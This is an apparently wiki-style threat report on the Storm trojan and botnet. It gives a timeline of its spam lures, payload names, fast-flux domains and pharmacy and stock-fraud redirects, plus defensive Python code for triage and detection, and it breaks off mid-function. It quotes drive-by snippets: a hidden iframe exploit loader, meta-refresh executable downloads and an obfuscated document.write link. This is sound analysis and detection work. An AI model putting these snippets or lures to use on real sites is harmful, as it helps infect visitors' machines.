Introduction
The Storm trojan is many things. It is arguably a worm, a trojan, the unit element of a botnet, a hijacked web host, a spam sender, a directory harvester, an HTTP web-site redirector, a member of a DDoS attack force, a zombie. It is spread by spam messages, which can be sent from machines infected with Storm itself. The spammed message may contain a link to a hijacked host web site or web-site proxy, which is also running on Storm. The hijacked host may offer an attractive file for download, which once again contains the Storm infection.
Storm is unique in its ability to perform so many functions. As of December 2007 it is the most pervasive and most successful implementation of a multifunctional infection that the Internet has ever witnessed, and its capacity to exert control over key sectors of the Internet is unprecedented. Storm is too great a threat to be ignored. Researchers' estimates of the number of infected Windows machines range from a minimum of 2 million up to 50 million. The scanner used in Botnet Reporting usually accumulates 3,500 to 4,000 hijacked IPs actively hosting the distribution of Storm in any 24-hour period. The most heavily infected ISPs are located in the US.
The three most infected ISPs alone account for over 20% of the world's Storm distribution network. The geographical distribution of Storm hosting sites for the top 10 countries is shown in the chart, which gives the accumulated host IPs from October 2007 to April 2008.
Images
A list of infected machines used in botnets to host spammed sites, including the Storm trojan itself, can be found in the spamtrackers download area for botnets.
Sample Spam
Received: from wbmdos (unknown[59.24.160.53]) by example.net (exin02) with SMTP id <2007101005045710700k7imqe>; Wed, 10 Oct 2007 05:05:55 +0000
X-Originating-IP: [59.24.160.53]
Received: from bngq ([33.223.57.69]) by wbmdos with Microsoft SMTPSVC(5.0.2195.5329); Wed, 10 Oct 2007 14:05:44 +0900
Message-ID: <470D7DA3.7060302@fnblondonky.com>
Date: Wed, 10 Oct 2007 14:05:44 +0900
From: <nternet@fnblondonky.com>
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
To: example@example.net
Subject: come get it
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Free games, What more do we need to say?
http://76.180.***.***/
In this example it is possible that the sending IP address, 59.24.160.53, was itself infected with Storm and that Storm sent the message. Only the topmost Received header, written by the receiving server, can be trusted; the second one, naming 33.223.57.69, was supplied by the sending host and may be forged. It is definite that the web site IP, 76.180.***.***, was a distributor of Storm. The site at that address is designed to attract younger Internet users: previously it offered a tempting 1,000 different arcade games for free at the click of an icon, and now it masquerades as a greetings club with a funny kitten animation.
If we look at the links on that page, we discover that every link points to the same file, which in this case is the Storm trojan itself.
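The kind of triage that leads to the conclusions above, as an added example (not code from the original page): it walks the Received chain, trusting only the hop written by our own mail exchanger, lists the hops the sender claims below it, and flags links whose host is a bare IP address. It assumes example.net is our MX and substitutes the documentation address 192.0.2.10 for the masked distribution host.

```python
"""Triage of a spam sample such as the one above.

Added example, not code from the original page. The message is the sample
above re-typed; the masked distribution address is replaced by the
documentation address 192.0.2.10, and example.net is assumed to be our MX.
"""
import email
import ipaddress
import re
from email import policy
from urllib.parse import urlsplit

TRUSTED_MX = {"example.net"}   # assumption: hosts whose Received lines we wrote

RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?P<info>[^)]*)\)\s+by\s+(?P<by>[\w.-]+)")
BRACKET_IP_RE = re.compile(r"\[([0-9a-fA-F:.]+)\]")
URL_RE = re.compile(r"""https?://[^\s<>"'()]+""")

SAMPLE_SPAM = """\
Received: from wbmdos (unknown[59.24.160.53]) by example.net (exin02)
 with SMTP id <2007101005045710700k7imqe>; Wed, 10 Oct 2007 05:05:55 +0000
X-Originating-IP: [59.24.160.53]
Received: from bngq ([33.223.57.69]) by wbmdos
 with Microsoft SMTPSVC(5.0.2195.5329); Wed, 10 Oct 2007 14:05:44 +0900
Message-ID: <470D7DA3.7060302@fnblondonky.com>
Date: Wed, 10 Oct 2007 14:05:44 +0900
From: <nternet@fnblondonky.com>
To: example@example.net
Subject: come get it
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Free games, What more do we need to say?
http://192.0.2.10/
"""


def is_ip_literal(host):
    """True when the URL host is a bare IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def received_hops(msg):
    """Parse each Received header, newest first, into helo / ip / by."""
    hops = []
    for header in msg.get_all("Received", []):
        text = re.sub(r"\s+", " ", str(header))      # unfold continuation lines
        m = RECEIVED_RE.search(text)
        if not m:
            continue
        ip = BRACKET_IP_RE.search(m.group("info"))
        hops.append({"helo": m.group("helo"),
                     "ip": ip.group(1) if ip else None,
                     "by": m.group("by")})
    return hops


def triage(raw_message):
    """Return the trusted first hop, the sender-claimed hops and the body URLs."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    first_hop, claimed = None, []
    for hop in received_hops(msg):
        if first_hop is None:
            # Hops above the first trusted 'by' are our own relays; the first
            # trusted one records the IP that actually connected to us.
            if hop["by"] in TRUSTED_MX:
                first_hop = hop["ip"]
        else:
            claimed.append(hop["ip"])   # everything below is sender-supplied
    charset = msg.get_content_charset() or "latin-1"
    body = msg.get_payload(decode=True).decode(charset, "replace")
    urls = []
    for url in URL_RE.findall(body):
        host = urlsplit(url).hostname or ""
        urls.append({"url": url, "host": host, "ip_literal": is_ip_literal(host)})
    return {"first_hop": first_hop, "claimed_hops": claimed,
            "from": str(msg.get("From", "")), "urls": urls}


if __name__ == "__main__":
    print(triage(SAMPLE_SPAM))
```

The first hop is what a blocklist or a Storm-tracker submission should record; the claimed hops and the From address are only useful as pattern evidence, since the sender wrote them.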
Also known as
Wikipedia lists various names for this trojan:
- CME-711 (MITRE)
- W32/Nuwar@MM and Downloader-BAI (specific variant) (McAfee)
- Troj/Dorf and Mal/Dorf (Sophos)
- Trojan-Downloader.Win32.Small.dam
- Trojan.DL.Tibs.Gen!Pac13 ("FSEC")
- Trojan.Downloader-647
- Trojan.Peacomm (Symantec)
- TROJ_SMALL.EDW (Trend Micro)
- Win32/Nuwar (ESET)
- Win32/Nuwar.N@MM!CME-711 (Windows Live OneCare)
- W32/Zhelatin (F-Secure and Kaspersky)
- Trojan.Peed, Trojan.Tibs (BitDefender)
Multi AV scan of happy2008.exe - Scan taken on 26 Dec 2007
- AntiVir - Found WORM/Zhelatin.ob
- Authentium - W32/StormWorm.P
- AVG Antivirus - Found Downloader.Tibs
- BitDefender - Found Trojan.Peed.IRE
- Dr.Web - Found Trojan.Packed.263
- eTrust-Vet - Win32/Sintun.AT
- F-Prot Antivirus - Found W32/StormWorm.P
- F-Secure Anti-Virus - Found Packed.Win32.Tibs.gu
- Kaspersky Anti-Virus - Found Packed.Win32.Tibs.gu
- Microsoft - Trojan:Win32/Tibs.gen!ldr
- Prevx1 - Stormy:Worm-All Variants
- Sophos Antivirus - Found Mal/Dorf-C
- Symantec - Trojan.Peacomm.D
- Webwasher-Gateway - Worm.Zhelatin.ob
Removal
In September 2007 Microsoft added detection and removal of Storm to its Malicious Software Removal Tool (MSRT), which is distributed through Windows Automatic Update. On September 25 Microsoft announced that MSRT might have reduced the size of the Storm botnet by up to 20%, claiming that the update removed Storm from approximately 274,372 of the 2.6 million Windows systems scanned. However, according to senior security staff at Microsoft, "the 180,000+ additional machines that have been cleaned by MSRT since the first day are likely to be home user machines that were not notably incorporated into the daily operation of the 'Storm' botnet", which suggests that the MSRT cleaning may have been symbolic at best.
Removal instructions vary by Antivirus vendor.
For Symantec, it is at the Storm write-up page
For McAfee you need to be at the latest levels.
For F-Secure you need to be at the latest level.
Microsoft provides a Malicious Software Removal Tool (MSRT) which removes the Storm infection.
Storm / Zhelatin timeline
Feb 2007 - April 2007
In a series of social engineering releases designed to infect multiple different target sectors, this worm has appeared under many different forms. Target sectors include children, people intrigued by whimsical greeting cards, sports fanatics, the security conscious, people seeking love, people intrigued by war, news watchers, people who like to offer help, problem solvers, volunteers, game players, gamblers, etc. By varying the offering in each wave of spam, the perpetrator has sought to maximize the infection rate among the target victims.
The timeline of spam attacks illustrating the different target sectors is shown below.
February 11, 2007
The Storm worm was being spread over instant-messaging services with messages such as
LOL ;-) http://***.***.***.***/ag.*** (active at the time of writing)
February 14
A Zhelatin variant uses Valentine's Day in mail subjects such as
- Valentines Day Dance
- The Valentines Angel
- Valentines Day is here again
- Valentine’s Love
- Valentine’s Night
- Valentine Letter
- Your Love on Valentine’s
Payloads:
- Flash Postcard.exe
- flash postcard.exe
- greeting postcard.exe
- Greeting Postcard.exe
- greeting card.exe
- Greeting Card.exe
- postcard.exe
- Postcard.exe
April 9
A World War III (USA versus Iran) lure, with subjects such as
- USA Missle Strike: Iran War just have started
- Israel Just Have Started World War I II
- Iran Just Have Started World War III
- USA Just Have Started World War III
- Missle Strike: The USA kills more then 20000 Iranian citizens
Payloads: "News.exe" , "Movie.exe" , "Read_Me.exe" , "Click_Me.exe" , "Video.exe" , "Read_More.exe"
April 12
The lovers' worm, with subjects like
- A Toast My Love
- A Token of My Love
- Come Dance with Me
- Come Relax with Me
- Destiny
- Dream of You
- Eternal Love
- Eternity of Your Love
Payloads included Love Card.exe Love Postcard.exe My Love.exe Postcard.exe
April 13
Bogus virus or worm alert, with subjects like
- Worm Alert!
- Worm Detected!
- Virus Alert!
- Virus Activity Detected!
The payload names now include a random numeric component:
- patch-[Random 4 digits].zip
- removal-[Random 5 digits].zip
- hotfix-[Random 5 digits].zip
- bugfix-[Random 5 digits].zip
June 2007 - August 2007
June 16
Greetings on .hk domains: the message body linked to many different .hk domains. Subjects were typically
- For You....My Love
- Gday
- Gday, Bud
- Gday, Pal
- Good day!
- Hello
- Hello, Bud
Payload: fun.exe (also some MS exploits in the web page)
June 22
Greeting cards from a friend
- You've received a postcard from a family member!
- Your family member has sent you a postcard from greetingcards.com.
- You've received a greeting card from a friend!
- You've received a greeting postcard from a worshipper!
Payload: ecard.exe
July 8
These spams masquerade as malware patches, with subject lines such as "Trojan Detected!"
Payload: patch.exe
August 15
Spam subjects take the form "XXX e-card" (XXX being, for example, Birthday or Musical).
Payload: msdataaccess.exe
August 21
Following the link in the spam leads to a page claiming that a "Secure Login Applet" must be installed on your computer. The payload is called "applet.exe".
Spam subjects include:
- Dated Confirmation
- Internal Support
- Internal Verification
- Login Verification
- Membership Details
- New Member Confirmation
- Registration Confirmation
- User Services
August 25
The lure is once again an e-card. Spam subjects include:
- b A card for you
- Here is your E-greeting
- Someone sent you an Ecard
- This is for you
- You have a new eCard from...?
- You have received an eCard
The link in the body of the text changed from an IP (http://***.***.***.***) to a name (http://example.com)
August 26
Zhelatin begins using a YouTube video as the lure.
Spam subjects include:
- are you kidding me? lol
- Dude your gonna get caught, lol
- Dude, what if your wife finds this?
- man, who filmed this thing?
- HAHAHAHAHAHA, man your insane!
Payload = "video.exe"
August 29
The subjects used include
- Could you give us a hand?
- Could you give us your opinion?
- Put in your two cents
- We could use your help
Payload = "setup.exe"
August 30
Spam subjects:
- Cool Video is out
- dude this is not even on MTV yet
- Hot new video
- OMG, check out the new video
- this video is not out yet
- this video rocks
- your gonna love this, lol
The page tells the victim: "If the video does not start playing, you need to load the right codec. Click on the link to install it."
Payload = "codec.exe"
September 2007 - December 2007
September 14
Storm Trojan adopted a Football theme by offering a "game tracking system":
- Are you ready for football season?
- Are you ready for some football?
- Do you have your NFL Game List?
- Football Fan Essentials
- Football Season Is Here!
- FOOTBALL! Are You ready?
- Free NFL Game Tracker
Payload: tracker.exe
September 17
Spreading with 1000+ free games as the attraction. The spams used subjects such as
- 1000+ Free Games!
- GAMES! GAMES!
- Stop paying for games
- Thousands of hours of fun, for free
- Play all your favorite games for free
- Wow, cool games!
Payload = "ArcadeWorld.exe"
October 12
The laughing psycho kitty cat ecard. The subjects include
- Someone is thinking of you! Open your ecard!
- We have a ecard greeting for you.
- We have a ecard surprise!
Payload = SuperLaugh.exe
October 17
The Krackin site. The sample spam varies, but the web site purports to provide virus protection and IP blocking; the target audience is the security-conscious user. A typical spam reads:
All the new movies music and more. In one place. The Krackin network. http://***.***.***.***
Payload: krackin.exe
October 28
The Halloween version, where the target audience is the seasonal fun lover. Typical subjects include
- Make him dance
- Man this is funny
- To much fun
Sample spam -
The Dancing Skeleton Do You Want To See New Funny Sexual Helloween Game with Dancing Skeleton? Just Click Here Via Email, MSN, or IRC
Payload: halloween.exe or dancer.exe
November 12
A pump-and-dump scam was loaded onto the Storm hosting bots, replacing the existing payload. At URL http://xxx.xxx.xxx.xxx/stock.html it contained
Global Economy Newsletter
Hemisphere Gold Inc. (HPGI) Current: $1.00 Market Alert - Strong Buy
Gold investors find safe haven as the US Dollar continues to drop throughout 2007.
Market Status: Since 2006 market annalists predicted gold to hit $800 per ounce within two years. Gold has hit $812 an ounce just one year later due to depleted gold supplies and a falling US Dollar. In an effort to find more gold, recent findings of large Gold deposits in Suriname has turned this small country into a modern day gold rush.
Hemisphere Finds Gold! Hemisphere Gold.s Properties are sitting right in the middle of the largest gold mines in the region and advanced exploration has already found gold deposits as high as 3.55 ounces/ton. This region has already become know as the Gold Belt.
6 Reasons To Own HPGI
1: Gold is on a Bull Run, climbing over $200 an ounce in just 9 months.
2: Gold demand is at record highs and is expected to continue increasing.
3: Hemisphere has the cutting edge technology and financial team to take this all the way.
4: Hemispheres property sits right in the middle of the Gold Belt where over 50 million ounces of gold have already been extracted.
5: Recent findings have pushed share prices up over 120% in the last 30 days.
6: Gold is a traditional safe haven for investors in times of trouble as it keeps its value greater than currency.
Hemisphere is launching a full scale marketing campaign with coverage already found on sites like Stockguru.com. With huge results already confirmed HPGI is moving into the final stages of exploration. This leaves nothing left but mining a large deposits in a primed market. HPGI should be on the top of your list for your next investment consideration.
November 18
The payload (dancer.exe) has generally been removed, so that clicking on the Download area produces
404 Not Found nginx/0.5.17
However, the page source still contains a hidden (zero-size) iframe that loads a third-party exploit page:
<iframe src="/cgi-bin/in.cgi?p=user1" width="0" height="0"></iframe>
This exploit is analyzed at the disog.org site and described at this blogspot.
This same iframe injection has also been found on general web sites as a "drive-by" installation.
November 26
The Storm host machines returned only a blank page. Attempts to load any page, such as /stock.html, returned a not-found condition:
404 Not Found nginx/0.5.17
December 11
The current payload on the Storm site servers is the file "sony.exe" which McAfee identifies as Nuwar@MM
It contains the following trojan fingerprint strings within its code:
- Software\Microsoft\Windows\CurrentVersion\Run
- noskrnl.exe
- noskrnl.config
These fingerprints are covered in the Symantec Technical description of this trojan.
The trojan code can be viewed safely without downloading it. Search for the fingerprint string noskrnl.config to verify that a sample is the Storm infection.
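A string-level check for these fingerprints, as an added example (not code from the original page or from any vendor's tool). Strings are extracted in both ASCII and UTF-16LE, since Windows binaries carry registry paths and file names in either form; the sample blob is constructed, and the rule that noskrnl.config together with the Run key marks a Storm sample follows the text above.

```python
"""Check a suspect binary for the Storm fingerprint strings listed above.

Added example, not code from the original page. SAMPLE_BLOB and BENIGN_BLOB
are constructed so the check runs offline.
"""
import re

FINGERPRINTS = [
    rb"Software\Microsoft\Windows\CurrentVersion\Run",
    rb"noskrnl.exe",
    rb"noskrnl.config",
]


def extract_strings(blob, min_len=6):
    """Return (offset, encoding, text) for printable runs of at least min_len chars."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)   # UTF-16LE
    found = [(m.start(), "ascii", m.group().decode("ascii"))
             for m in ascii_re.finditer(blob)]
    found += [(m.start(), "utf-16le", m.group().decode("utf-16-le"))
              for m in wide_re.finditer(blob)]
    return sorted(found)


def match_fingerprints(blob):
    """Map each fingerprint found to the (offset, encoding) pairs where it occurs."""
    wanted = [f.decode("ascii") for f in FINGERPRINTS]
    hits = {}
    for offset, encoding, text in extract_strings(blob):
        for needle in wanted:
            if needle.lower() in text.lower():
                hits.setdefault(needle, []).append((offset, encoding))
    return hits


def looks_like_storm(blob):
    """The page's rule: noskrnl.config plus the Run key identifies a Storm sample."""
    hits = match_fingerprints(blob)
    return "noskrnl.config" in hits and any(k.endswith("\\Run") for k in hits)


def scan_file(path):
    with open(path, "rb") as fh:
        return match_fingerprints(fh.read())


# Constructed stand-in for a dropper: a fake header, the Run key in ASCII,
# noskrnl.exe as a wide string, noskrnl.config in ASCII, then binary filler.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 16
    + rb"Software\Microsoft\Windows\CurrentVersion\Run" + b"\x00" * 4
    + "noskrnl.exe".encode("utf-16-le") + b"\x00\x00"
    + b"\x7f\x01\x02" + b"noskrnl.config\x00"
    + b"\xde\xad\xbe\xef" * 4
)
BENIGN_BLOB = b"MZ\x90\x00" + b"Hello, world program with no suspicious strings\x00"

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_BLOB), ("benign", BENIGN_BLOB)):
        print(name, looks_like_storm(blob), match_fingerprints(blob))
```

Packed samples will not expose these strings until unpacked or dumped from memory; the check is for the dropped noskrnl.exe or an unpacked image, not for the packed downloader as it arrives.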
December 12/13
The image file installed on the hosts carries a pump-and-dump securities fraud scam pushing the Pink Sheets stock CYHA (Cyberhand Technologies).
December 14
The image file is replaced with two alternative files pumping two stocks FAVE and BSGC.
FAVE is listed in a press release as Simulated Environment Concepts, Inc. (PINKSHEETS: FAVE). The company web site is http://www.spacapsule.com/
Press Contact: IR Complete, Inc. 919-468-4511
BSGC is Big String Corporation, mentioned in a November Penny Investor listing as a #1 pick. The company web site is at http://www.bigstring.com
http://finance.yahoo.com/q/bc?s=BSGC.OB&t=3m
December 24
The Christmas lure is a predictable ploy - a fake greeting card. Typical subject lines:
- Merry Christmas To All
- Warm Up this Christmas
- Mrs. Clause Is Out Tonight!
- The Twelve Girls Of Christmas
- Jingle Bells, Jingle Bells
- Cold Winter Nights
.. sent you an e-card from our Free Electronic Card Service.
To view your customized greeting card, simply click on the following Internet location
http://www.americangreetings.b719.cn/[whatever]
Regards
Webmaster
Winter can be cold. I bet you could use a little something to warm you up. Take 2 min out of your day. You wont regret it. ;-) http://merrychristmasdude.com/
Payloads: happy2008.exe and sony.exe
December 26
Post Christmas Storm spams portray a New Year theme. Subjects include
- Opportunities for the new year
- Message for new year
- New Year wishes for you
- Blasting new year
- It’s the new Year
- Joyous new year
- New Hope and New Beginnings
Typical URLs:
- uhavepostcard.com
- happycards2008.com
- newyearcards2008.com
- newyearwithlove.com
- familypostcards2008.com
Payloads: "happy2008.exe" "happy-2008.exe" "happynewyear2008.exe" "happynewyear.exe" "stripshow.exe" "happy_2008.exe"
The link to the payload is obfuscated by writing it out from a percent-encoded string:
document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E' ) );
Decoded, the string is <a href="happynewyear2008.exe">.
Domain names are now being registered through a Russian registrar, each with a bank of name servers and the usual fast-flux behaviour:
Domain Name: HAPPYCARDS2008.COM
Registrar: ANO REGIONAL NETWORK INFORMATION CENTER DBA RU
Whois Server: whois.nic.ru
Referral URL: http://www.nic.ru
Name Server: NS.HAPPYCARDS2008.COM
Name Server: NS2.HAPPYCARDS2008.COM
Name Server: NS3.HAPPYCARDS2008.COM
Name Server: NS4.HAPPYCARDS2008.COM
Name Server: NS5.HAPPYCARDS2008.COM
Name Server: NS6.HAPPYCARDS2008.COM
Name Server: NS7.HAPPYCARDS2008.COM
Name Server: NS8.HAPPYCARDS2008.COM
Name Server: NS9.HAPPYCARDS2008.COM
Name Server: NS10.HAPPYCARDS2008.COM
Name Server: NS11.HAPPYCARDS2008.COM
Name Server: NS12.HAPPYCARDS2008.COM
Name Server: NS13.HAPPYCARDS2008.COM
Status: clientTransferProhibited
Updated Date: 26-dec-2007
Creation Date: 26-dec-2007
Expiration Date: 26-dec-2008
December 29
Additional domains added:
- freshcards2008.com
- familypostcards2008.com
- merrychristmasdude.com
- newscorpalerts.com
- happy2008toyou.com
- happysantacards.com
- hellosanta2008.com
- hohoho2008.com
- parentscards.com
- postcards-2008.com
- santapcards.com
- santawishes2008.com
January 2008 - March 2008
January 9, 2008
For a short time the Storm network was used in a phishing operation aimed at the Halifax and Barclays banks. The fake domain names registered were i-halifax.com and i-barclays.com.
January 10
The domain names used to resolve the zero-TTL fast-flux addresses were all suspended by the registrars in a synchronised move. Only machines already infected could still join the network; new infections were effectively unable to locate any other network members, and any infected machine that was restarted would be likely to fail to reconnect. This is expected to produce a major reduction in bots within the standard 48-hour DNS caching period.
January 16
Spamming resumed using raw IP addresses in the links. The subject line is "With Love!".
The payload file, withlove.exe or with_love.exe, was linked from obfuscated JavaScript.
January 31
Sample spam contents
Subject: You won't spend to much for these meds! Dreams can cost less here! http://91.122.38.100/xfj/
The IP address in the spam is a Storm-infected machine. Repeatedly loading the same URL on that or any other Storm IP with /xfj/ appended (the directory name appears to be chosen at random) produces redirections to exactly 8 Canadian Pharmacy sites:
- andconsider.com
- bringinstrument.com
- endscience.com
- measureremember.com
- owndeep.com
- speakpound.com
- tellthrough.com
- thanpopulate.com
Canadian Pharmacy sites are in turn hosted on another fast-flux botnet. Different randomly selected subdirectory names yield the same result.
Geographic fingerprinting reveals completely different topologies for these two botnets. The geo-print for Storm is shown under the topic Botnet hosting, and that for Canadian Pharmacy in File:Bot PUF.jpg.
February 7 The infected page was changed to contain obfuscated code
February 10
Redirections from Storm infections to fake Canadian Pharmacy sites
- interestquiet.com
- chickher.com
- byoperate.com
- elementgrand.com
- tenpitch.com
- roundtoward.com
- twoinstant.com
February 11 Eight new images were introduced with a Valentines theme. There is a more direct load of the virus payload (valentine.exe) using "refresh" to ensure a higher infection rate:
<html xmlns="http://www.w3.org/1999/xhtml">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta http-equiv="refresh" content="5;url=valentine.exe">
<title>Your Valentine</title>
<body>
<center>
<a href="valentine.exe"><img border=0 src="5.gif"><br></a>
</body>
</html>
The random gif with the unconvincing pump and dump stock scam has been removed.
Domain names used to serve the zero-TTL fast-flux network:
- moonstarfood.com (removed)
- destroythemoon.com (removed)
Name servers were on
- ns.llldddnnn.com 76.212.174.58
- ns2.llldddnnn.com 68.252.56.21
- ns3.llldddnnn.com 64.221.169.181
- ns4.llldddnnn.com 75.132.160.97
- ns5.llldddnnn.com 68.184.51.232
- ns6.llldddnnn.com 80.197.35.241
- ns7.llldddnnn.com 90.150.141.112
- ns8.llldddnnn.com 78.8.106.11
- ns9.llldddnnn.com 59.31.54.198
- ns10.llldddnnn.com 60.53.245.92
- ns11.llldddnnn.com 98.206.242.41
- ns12.llldddnnn.com 76.97.95.128
- ns13.llldddnnn.com 24.98.214.216
February 14 Current Canadian Pharmacy redirections from Storm hosts (nginx/0.5.17) for URLs in the format http://xxx.xxx.xxx.xxx/junk/
- chancetoo.com
- enoughbreak.com
- gonebox.com
- largespeech.com
- planepound.com
- quickwant.com
- safecause.com
The randomised pump-and-dump stock gif, previously loaded from a URL in the format http://xxx.xxx.xxx.xxx/junk.gif, remains removed.
March 3 The image changed to a "FunnyPostCard" lure. The payload was ecard.exe, and a download is attempted even if the victim does not click on the image, by using an HTTP meta refresh:
<meta http-equiv="Refresh" content="5; URL=ecard.exe">
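A static check for the lure tricks documented above (the zero-size iframe of November 18, the document.write(unescape(...)) link of December 26, and the meta refresh of February 11 and March 3), as an added example rather than code from the original page. The sample pages are assembled from the fragments quoted on this page; the list of executable extensions is an assumption.

```python
"""Static triage of a captured Storm lure page.

Added example, not code from the original page. It reports hidden iframes,
meta refreshes that push an executable, direct links to executables, and
document.write(unescape(...)) fragments, which it decodes and scans too.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat")   # assumption
UNESCAPE_RE = re.compile(r"""unescape\(\s*['"]([^'"]*)['"]\s*\)""")


class LureScanner(HTMLParser):
    """Collects (kind, target) findings from start tags."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        if tag == "iframe" and (a.get("width") == "0" or a.get("height") == "0"
                                or "display:none" in style):
            self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content="5;url=valentine.exe" or content="5; URL=ecard.exe"
            target = a.get("content", "").split(";", 1)[-1].strip()
            target = re.sub(r"^url\s*=\s*", "", target, flags=re.I)
            if target.lower().endswith(EXECUTABLE_EXT):
                self.findings.append(("refresh_to_executable", target))
        elif tag == "a" and a.get("href", "").lower().endswith(EXECUTABLE_EXT):
            self.findings.append(("link_to_executable", a["href"]))


def scan(html, depth=0):
    """Return a list of (kind, target) findings for one page."""
    scanner = LureScanner()
    scanner.feed(html)
    scanner.close()
    findings = scanner.findings
    if depth < 3:
        # Decode document.write(unescape('...')) fragments and scan them as HTML.
        for m in UNESCAPE_RE.finditer(html):
            decoded = unquote(m.group(1))
            findings.append(("obfuscated_html", decoded))
            findings.extend(scan(decoded, depth + 1))
    return findings


def is_drive_by(findings):
    """True when the page tries to infect without a click."""
    return any(kind in ("hidden_iframe", "refresh_to_executable") for kind, _ in findings)


# Constructed samples, assembled from the fragments quoted on this page.
SAMPLE_NOV18 = ('<html><body>404 Not Found nginx/0.5.17'
                '<iframe src="/cgi-bin/in.cgi?p=user1" width="0" height="0"></iframe>'
                '</body></html>')
SAMPLE_DEC26 = ("<html><body><script>document.write( unescape( "
                "'%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72"
                "%32%30%30%38%2E%65%78%65%22%3E' ) );</script></body></html>")
SAMPLE_FEB11 = """<html xmlns="http://www.w3.org/1999/xhtml">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta http-equiv="refresh" content="5;url=valentine.exe">
<title>Your Valentine</title>
<body><center>
<a href="valentine.exe"><img border=0 src="5.gif"><br></a>
</body></html>"""
SAMPLE_BENIGN = '<html><body><a href="/about.html">About us</a></body></html>'

if __name__ == "__main__":
    for name, page in (("nov18", SAMPLE_NOV18), ("dec26", SAMPLE_DEC26),
                       ("feb11", SAMPLE_FEB11), ("benign", SAMPLE_BENIGN)):
        found = scan(page)
        print(name, "drive-by" if is_drive_by(found) else "needs click", found)
```

The distinction is_drive_by draws matters for triage: a page that only links to an .exe needs the victim to click, whereas the iframe and refresh variants act on a visit alone.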
Redirection sites for Canadian Pharmacy and Cheap Drugs Online Store
- picksuch.com
- wonderright.com
- fallbroad.com
- pharmapillsforu.com
- rxpills4u.com
- cheapestpillshere.com
- ranglad.com
- speakplant.com
March 4 A new wave of spams that repeat an earlier phase of Storm propagation via fake greeting cards
Subject lines:
- Your ecard joke is waiting
- You have an ecard
- We have a ecard surprise
- Someone Just sent you an ecard
- Did you open your ecard yet
- ecard waiting for you
- Open your ecard
- new ecard waiting
- Now this is funny
- online greeting waiting
- sent you an ecard
Body text:
- laughing Funny Card
- You have been sent a Funny Postcard
- You have been sent the Funny Ecard
- original Funny Card
- Someone Sent you this Funny Ecard
- your funny postcard
- original Funny Postcard
- sent a Funny Postcard
- personal funny postcard
- FunnyPostcard
- laughing funny postcard
March 20 The domain name used to interconnect Storm sites was ibank-halifax.com, registered with the Russian company ANO REGIONAL NETWORK INFORMATION CENTER. On March 18, 2008 it was suspended:
- Status: clientHold
- Status: clientTransferProhibited
However, existing Storm hosts were still performing redirections to spam sites registered with Xin Net, grouped here by pharmacy brand:
- ED Express: surfpart.com, darksidehq.com, superwildside.com, twinsideauto.com
- Pharmacy Express: daysidehomes.com, sideeventsonline.com, flipsidesite.com
- United ED Meds: esideeffect.com
All of these sites loaded their images from the one Image Server - oleroneg.info (Sponsoring Registrar: Blog.com Digital Communications Inc.)
March 31 The latest edition had an April Fool's Day theme. The picture is of a jester with the placard "April Fool" and trailing a slogan "Kick me hard" Sample subject lines were
- All Fools' Day
- Doh! All's Fool.
- Doh! April's Fool.
- Gotcha!
- Surprise! The joke's on you.
Payloads included funny.exe, foolsday.exe, kickme.exe
April 2008 - July 2008
April 6 Google's much-abused Blogspot redirection was used to draw victims into infected distribution sites. Spammed links of the form http://some-name.blogspot.com redirected with an HTTP refresh to an infection site.
April 9
Date: Tue, 8 Apr 2008 22:59:22 -0400
Subject: With all my love
I Love Being In Love With You http://supersameas.com/
Payload = StormCodec8.exe and StormCodec.exe
April 14 Spams link to a variety of web sites owned by innocent parties, for either a file called "redir.html", which redirects to sugaronly.com, a Canadian Pharmacy scam site, or a file called "video.exe", which is the Storm Worm download. All sites carry both files, though usually only one is spammed.
Sample spam:
Hello, make a wise decision, get your meds from the most reliable provider. http://www.google.it/pagead/iclk?sa=l&ai=USRUkh&num=28816&[line break inserted] adurl=http://justleopold.com/redir.html Coupon #9FQN guthrey jael
Substituting "video.exe" for "redir.html" on justleopold.com will attempt to download Storm Worm on your computer.
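Unwrapping such redirector links, as an added example (not code from the original page): the real destination is the value of the adurl= parameter, so that is what should be blocklisted rather than the google.it wrapper, and the same host's video.exe can be derived from it as the text describes. NESTED_LINK is a constructed case of a wrapper inside a wrapper.

```python
"""Unwrap redirector links like the April 14 sample above.

Added example, not code from the original page. SAMPLE_LINK is the quoted
link with the inserted line break removed; NESTED_LINK is constructed.
"""
from urllib.parse import parse_qsl, urlsplit, urlunsplit

SAMPLE_LINK = ("http://www.google.it/pagead/iclk?sa=l&ai=USRUkh&num=28816"
               "&adurl=http://justleopold.com/redir.html")
# Constructed: a wrapper inside a wrapper, the inner one percent-encoded.
NESTED_LINK = ("http://a.example/r?u="
               "http%3A%2F%2Fb.example%2Fr%3Fu%3Dhttp%3A%2F%2Fc.example%2Fx")


def inner_url(url):
    """First query parameter whose (decoded) value is an absolute URL, else None."""
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if value.lower().startswith(("http://", "https://")):
            return value
    return None


def unwrap(url, max_depth=5):
    """Return the redirect chain [wrapper, ..., final destination]."""
    chain = [url]
    while len(chain) <= max_depth:
        nxt = inner_url(chain[-1])
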